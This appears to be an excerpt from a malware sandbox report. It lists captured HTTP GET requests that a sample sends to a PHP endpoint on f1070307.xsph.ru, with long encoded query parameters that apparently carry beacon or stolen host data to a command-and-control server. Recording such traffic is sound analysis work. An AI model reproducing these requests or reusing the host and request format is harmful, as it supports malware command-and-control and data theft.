Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVNBzZ65ENJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiIkNjYyMTNmhzY2EjNkVmM3UWM1YzN3IzNmhDO0QWM1I2N2IjMhNzNzIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkVTZiVTNhJzM1ETN3M2NzEWNkdjNmJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JSOKl2Ysp0MiNnQIVmR4ZEW6R2MitWNXFGW4ZEWwolMipXOtNmasdFVjhnRihmTyIWT4ZEWoJFWZVkQINmQ4ZEW6ZVbiZHcHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkVTZiVTNhJzM1ETN3M2NzEWNkdjNmJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIwglZphjaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVNBzZ65ENJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiIkNjYyMTNmhzY2EjNkVmM3UWM1YzN3IzNmhDO0QWM1I2N2IjMhNzNzIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JyZUZTUYp1c4dVWYJUeiBjQYVWeOVUS6Z0RTtEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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